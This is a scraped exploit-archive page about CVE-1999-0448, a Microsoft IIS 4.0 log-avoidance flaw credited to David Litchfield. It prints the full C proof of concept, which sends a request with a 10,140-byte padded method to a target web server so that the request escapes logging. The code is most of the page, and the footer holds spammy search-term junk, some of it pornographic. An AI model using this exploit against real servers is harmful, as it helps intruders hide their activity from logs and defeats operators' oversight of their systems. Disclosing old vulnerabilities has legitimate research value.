about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , NT IIS4 Log Avoidance Vulnerability


Title NT IIS4 Log Avoidance Vulnerability
Published 1999-01-22-12:00AM
Updated 1999-06-01-12:00AM
Class Failure to Handle Exceptional Conditions
CVE   CVE-1999-0448
Remote  Yes
Local  Unknown
Credit  This vulnerability was posted to NTBugtraq by David Litchfield (Mnemonix)
Vulnerable  Microsoft IIS 4.0
Cisco Building Broadband Service Manager 5.0
Cisco Call Manager 1.0
Cisco Call Manager 2.0
Cisco Call Manager 3.0
Cisco ICS 7750
Cisco IP/VC 3540 Video Rate Matching Module
Cisco Unity Server 2.0
Cisco Unity Server 2.2
Cisco Unity Server 2.3
Cisco Unity Server 2.4
Cisco uOne 1.0
Cisco uOne 2.0
Cisco uOne 3.0
Cisco uOne 4.0
Microsoft BackOffice 4.0
Microsoft BackOffice 4.5
Microsoft Windows NT 4.0 Option Pack
Not Vulnerable  
Code  
/* Compile with eg Visual C++ and link with wsock32.lib

#include <stdio.h>
#include <winsock2.h>
#include <string.h>


int main (int argc, char *argv[])
{
int snd, rcv, err, portno,a=0,b, res;
char resp[1024];
WORD wVersionRequested;
WSADATA wsaData;
struct sockaddr_in sa;
struct hostent *he;
SOCKET sock;

if (argc !=2)
{
printf("Usage: c:\>%s target_machine David Litchfield 21st January
1999 ", argv[0]);
return 0;
}
wVersionRequested = MAKEWORD( 2, 0 );
err = WSAStartup( wVersionRequested, &wsaData );

if ( err != 0 )
{
printf("No winsock.dll ");
return 0;
}
if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 )
{
printf("No winsock.dll - 2nd ");
WSACleanup( );
return 0;
}

if ((he = gethostbyname(argv[1])) == NULL)
{
printf("Invalid Host ");
return 0;
}




sock=socket(AF_INET,SOCK_STREAM,0);
if (sock==INVALID_SOCKET)
{
printf("Invalid Socket! ");
return 0;
}
else
{
printf("");
}

sa.sin_addr.s_addr=INADDR_ANY;
sa.sin_family=AF_INET;



bind(sock,(struct sockaddr *)&sa,sizeof(sa));



sa.sin_port=htons(80);

memcpy(&sa.sin_addr,he->h_addr,he->h_length);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) < 0)
{
printf("Failed to connect! ");
}
else
{

/* This loop creates the REQUEST_METHOD and makes it 10140 bytes long

while (a < 10141)
{
snd=send(sock,"A", 1, 0);
a ++;
}
snd=send(sock," /default.asp HTTP/1.0 ",43,0);
rcv=recv(sock,resp,256,0);
printf(" %s",resp);
rcv=recv(sock,resp,1024,0);
printf(" %s ",resp);

}


closesocket(sock);

return 0;
}
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 17:09:03 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
microsoft pop up upb My eGaller Directory IPB free v mambo/inde Squirrelma noelia ens squid usb sun+niagar Www.bangla phpbb2 Hotsexphot GET /galle karalasex. news for c www.donova sega.com php-nuke 2 pop up www.pornsc www.aus888 playboy me community IOS News Searc www.indian upb gypsysexpi ip board 2 Linux Buff hindiporn Hot vagina news for c sexvlew www.89sex. banjarmasi SAKURA assian ana seeasians. same time digicart php nuke s rangemax Sexpic for entensity. sexy ***tu Www.6+arab